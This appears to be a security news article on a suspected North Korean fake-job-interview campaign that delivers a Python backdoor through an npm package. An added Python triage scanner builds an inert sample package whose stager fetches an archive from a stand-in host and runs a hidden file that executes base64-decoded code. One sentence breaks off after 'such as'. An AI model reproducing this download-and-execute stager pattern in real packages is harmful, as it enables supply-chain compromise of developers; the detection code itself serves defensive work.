North Korean Predilection for Elaborate Social Engineering Attacks Strikes Again
Likely North Korean threat actors are using fake job interviews to trick software developers into downloading disguised Python backdoors as part of an ongoing espionage campaign.
The attackers construct fake job interview scenarios designed to appear legitimate and enticing to developers seeking employment opportunities.
Once a victim has been lured in, the attackers instruct them to download seemingly harmless files from GitHub repositories, purportedly as part of the interview process, according to a report from Securonix, which is tracking the campaign as Dev#Popper.
Pyongyang hackers have a history of constructing elaborate social engineering ruses to infect computers that belong to security researchers and tech workers, including by masquerading as recruiters on LinkedIn and sending phishing emails purportedly containing job offers (see: North Korean Hackers Find Value in LinkedIn).
This suspected North Korean attack involves deployment of a deceptive Node Package Manager package that seems innocuous at first glance. On execution, it triggers the infiltration of the victim’s system. Following the initial stage, hackers install a Python-based remote access Trojan.
The backdoor provides the attackers with unfettered access to sensitive information and system resources, posing a threat to individual developers and the organizations they work for.
What sets this campaign apart is its exploitation of the inherent trust developers place in the job application process. While the GitHub repositories associated with the attack may have been removed, the threat persists, researchers said.
Later-Stage Campaign Details
The Node Package Manager package provided by the attacker includes files that mimic legitimate development tools, such as
On executing the downloaded NPM package, the malicious JavaScript code within it is activated through the Node.js process. This code serves as a gateway for further infiltration, initiating the next stages of the attack.
The JavaScript code downloads and extracts an archive file, which contains a disguised Python backdoor in the form of a hidden .npl file. The file, labeled as a Python file, employs string manipulation and decoding techniques to hide its true nature.
The Python code within the backdoor establishes communication with a command-and-control server controlled by the attackers.
The Python backdoor executes additional malicious scripts, such as a file labeled pay within the .n2 directory. These scripts carry out various malicious activities, including data exfiltration, system reconnaissance, and remote command execution.
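The staging chain described above (a Node.js entry point that downloads and unpacks an archive, a hidden file in a dot-directory that is really Python, and a payload that decodes strings before executing them) lends itself to file-level triage before a package is ever run. The following is an added example, not code from the Securonix report or from this article: a small Python scanner that walks an extracted npm package and flags those three traits. The regular expressions are heuristics chosen for this example and are not indicators published by the researchers; the sample package it builds in a temporary directory (including the inert `index.js` stager and the `.n2/.npl` file) is constructed here purely as test input and is never executed.

```python
"""Heuristic triage of an extracted npm package for a Dev#Popper-style staging chain.

Added example. The patterns below are assumptions for illustration, not published IoCs.
"""
import base64
import re
import tempfile
from pathlib import Path

# JavaScript that fetches something over the network, unpacks an archive and
# spawns another process is the "gateway" behaviour described for the stager.
JS_DOWNLOAD = re.compile(r"\b(?:https?\.get|fetch|axios|request)\s*\(")
JS_EXTRACT = re.compile(r"\b(?:unzip|tar|extract|zlib|adm-zip|AdmZip)\b", re.I)
JS_SPAWN = re.compile(r"child_process|\bexec(?:Sync)?\s*\(|\bspawn(?:Sync)?\s*\(")

# Lines that only make sense as Python: a bare import, a from-import, a def, or a
# python shebang. Written so that JavaScript `import x from 'y'` does not match.
PY_SYNTAX = re.compile(
    r"^\s*(?:from \w[\w.]* import \w|import \w[\w.]*(?:\s*,\s*\w[\w.]*)*\s*$"
    r"|def \w+\(.*\):\s*$|#!.*python)",
    re.M,
)
# exec/eval applied to decoded or reversed strings, or a long base64-looking blob.
PY_DECODE_EXEC = re.compile(
    r"\b(?:exec|eval)\s*\(.*?(?:b64decode|decode\(|fromhex|\[::-1\])", re.S
)
LONG_BLOB = re.compile(r"[\"'][A-Za-z0-9+/=]{60,}[\"']")


def _read(path: Path) -> str:
    try:
        return path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return ""


def scan_package(root) -> list:
    """Return a list of findings: {"path", "reason", "hidden"} per suspicious file."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel_parts = path.relative_to(root).parts
        rel = "/".join(rel_parts)
        hidden = any(part.startswith(".") for part in rel_parts)
        text = _read(path)
        # Python source hiding behind a non-.py name (e.g. a hidden .npl file).
        if path.suffix != ".py" and PY_SYNTAX.search(text):
            findings.append({"path": rel, "reason": "python_in_disguise", "hidden": hidden})
        # JavaScript that downloads, extracts and spawns: the stager pattern.
        if path.suffix in {".js", ".cjs", ".mjs"} and (
            JS_DOWNLOAD.search(text) and JS_EXTRACT.search(text) and JS_SPAWN.search(text)
        ):
            findings.append({"path": rel, "reason": "js_downloader_stager", "hidden": hidden})
        # String decoding feeding exec/eval, or an embedded encoded blob.
        if PY_DECODE_EXEC.search(text) or LONG_BLOB.search(text):
            findings.append({"path": rel, "reason": "obfuscated_payload", "hidden": hidden})
    return findings


def build_sample_package() -> str:
    """Write a constructed, inert sample package to a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="npm-triage-"))
    inner = "print('constructed sample payload: hello from the hidden file')"
    blob = base64.b64encode(inner.encode()).decode()
    files = {
        "package.json": '{"name": "interview-task", "version": "1.0.0", "main": "index.js"}\n',
        # Benign helper that must not be flagged.
        "lib/util.js": "module.exports = { add: (a, b) => a + b };\n",
        # Constructed stager shape (never executed here): fetch, unpack, spawn.
        "index.js": (
            "const https = require('https');\n"
            "const { execSync } = require('child_process');\n"
            "const unzip = require('unzip');\n"
            "https.get('https://staging.example.invalid/bundle.zip', (res) => {\n"
            "  res.pipe(unzip.Extract({ path: '.n2' }));\n"
            "});\n"
            "execSync('python .n2/.npl');\n"
        ),
        # Hidden, non-.py file that is really Python and decodes before exec.
        ".n2/.npl": f'import base64\n_d = "{blob}"\nexec(base64.b64decode(_d).decode())\n',
    }
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for finding in scan_package(build_sample_package()):
        flag = " (hidden)" if finding["hidden"] else ""
        print(f"{finding['reason']:24} {finding['path']}{flag}")
```

Run it on the directory left behind by `npm pack` followed by `tar xf`, or on a cloned repository, before any `npm install` or `node` invocation; the `hidden` flag is worth surfacing separately, since a dot-directory holding an interpreter script is unusual in a legitimate coding exercise.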
The attackers gain persistent access to compromised systems, allowing them to exfiltrate sensitive data, install additional malware or further exploit the compromised environment.